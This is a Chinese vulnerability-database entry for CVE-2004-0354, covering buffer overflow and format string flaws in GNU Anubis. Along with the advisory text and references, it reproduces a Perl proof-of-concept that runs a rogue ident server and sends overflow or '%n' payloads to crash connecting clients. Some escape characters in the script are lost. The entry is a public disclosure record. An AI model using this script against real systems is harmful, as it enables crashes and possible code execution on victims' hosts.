GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞

GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞

漏洞ID 1107762 漏洞类型 格式化字符串
发布时间 2004-03-01 更新时间 2005-10-20
图片[1]-GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞-安全小百科CVE编号 CVE-2004-0354
图片[2]-GNU Anubis多个远程缓冲区溢出和格式化字符串漏洞-安全小百科CNNVD-ID CNNVD-200411-096
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/23771
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-096
|漏洞详情
GNUAnubis3.6.0到3.6.2,3.9.92和3.9.93版本存在多个格式化字符串漏洞。远程攻击者可以借助传递到(1)log.c的info函数,(2)errs.c的anubis_error函数,或者(3)ssl.c的ssl_error函数的字符串说明符执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/9772/info

GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'.

These vulnerabilities have been reported to exist in GNU Anubis versions 3.6.0, 3.6.1, 3.6.2, 3.9.92, and 3.9.93. It is possible that other versions are affected as well.

These issues are undergiong further analysis, they will be divided into separate BIDs as analysis is completed.

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;


sub usage()
{
  die "usage: $0 typen".
      "type is 'a' (buffer overflow) or 'b' (format string bug).n";
} # sub usage


$port = 113;

usage() unless @ARGV == 1;
$type = shift;
usage() unless $type =~ m|^[ab]$|;

$send{'a'} = 'U' x 400;
$send{'b'} = '%n' x 28;
$sendstr = $send{$type};

$server = IO::Socket::INET->new(Proto => 'tcp',
                                LocalPort => $port,
                                Listen => SOMAXCONN,
                                Reuse => 1) or
          die "can't create server: $!";

while ($client = $server->accept())
{
  $client->autoflush(1);
  print "got a connectionn";

  $input = <$client>;
  $input =~ tr/1512//d;
  print "client said $inputn";

#  $wait = <STDIN>;
#  $wait = 'be quiet, perl -wc';

  $output = "a: USERID: a:$sendstr";
  print $client "$outputn";
  print "I said $outputn";

  close $client;
  print "disconnectedn";
} # while client=server->accept
|参考资料

来源:BID
名称:9772
链接:http://www.securityfocus.com/bid/9772
来源:XF
名称:anubis-format-string(15346)
链接:http://xforce.iss.net/xforce/xfdb/15346
来源:BUGTRAQ
名称:20040304GNUAnubisbufferoverflowsandformatstringbugs
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107843915424588&w;=2
来源:MLIST
名称:[bug-anubis]20040228Importantsecurityupdate
链接:http://mail.gnu.org/archive/html/bug-anubis/2004-02/msg00000.html

相关推荐: Novell Nsure Identity Manager Password Hint Plaintext Storage Weakness

Novell Nsure Identity Manager Password Hint Plaintext Storage Weakness 漏洞ID 1098606 漏洞类型 Design Error 发布时间 2004-04-13 更新时间 2004-04…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享